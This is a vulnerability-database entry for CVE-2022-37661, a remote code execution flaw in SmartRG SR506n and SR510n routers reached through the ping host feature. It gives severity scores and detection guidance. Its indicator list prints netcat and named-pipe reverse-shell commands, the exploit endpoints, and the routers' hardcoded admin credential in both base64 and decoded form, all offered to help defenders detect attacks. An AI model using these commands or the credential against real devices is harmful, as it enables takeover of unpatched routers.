cbcvebase.
CVE-2022-37661
published 2022-09-14

CVE-2022-37661: SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.

PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
36.19%
98.3th percentile
SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.

Affected

2 ranges
VendorProductVersion rangeFixed in
adtransr506n_firmware
adtransr510n_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/admin/ping.html
url/admin/pingHost.cmd
otherYWRtaW46QWRtMW5ATDFtMyM=3D
commandrm /tmp/s & mknod /tmp/s p & /bin/sh 0 /tmp/s
command|nc {lhost} {payload_port}|sh
  • Detect HTTP requests to /admin/ping.html and /admin/pingHost.cmd bearing a Basic Authorization header matching the hardcoded base64 credential 'YWRtaW46QWRtMW5ATDFtMyM=3D' (decodes to admin:Adm1n@L1m3#).
  • Alert on creation of a named pipe at /tmp/s (via mknod) on SmartRG router devices, which is a strong indicator of reverse-shell staging activity.
  • Look for outbound netcat (nc) connections from router processes, particularly piped to /bin/sh, as the exploit establishes a reverse shell using 'nc <lhost> <port> | sh'.
  • The exploit targets SmartRG SR506n firmware 2.5.15 and SR510n firmware 2.6.13; flag these specific version strings in asset inventory or banner-grabbing results for prioritized patching.
  • ·The exploit uses a hardcoded default/known credential for the router admin interface. The base64 value 'YWRtaW46QWRtMW5ATDFtMyM=3D' decodes to admin:Adm1n@L1m3#. Devices still using this default credential are immediately exploitable without any prior reconnaissance.
  • ·The exploit assumes the router is reachable at the default LAN gateway address 192.168.1.1, meaning exploitation is primarily an adjacent-network or LAN-side attack vector unless the admin interface is exposed to WAN.
  • ·The sessionKey required for the pingHost.cmd request is dynamically scraped from the /admin/ping.html page, meaning the exploit requires a valid authenticated session — exploitation depends on either default credentials or a previously compromised account.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.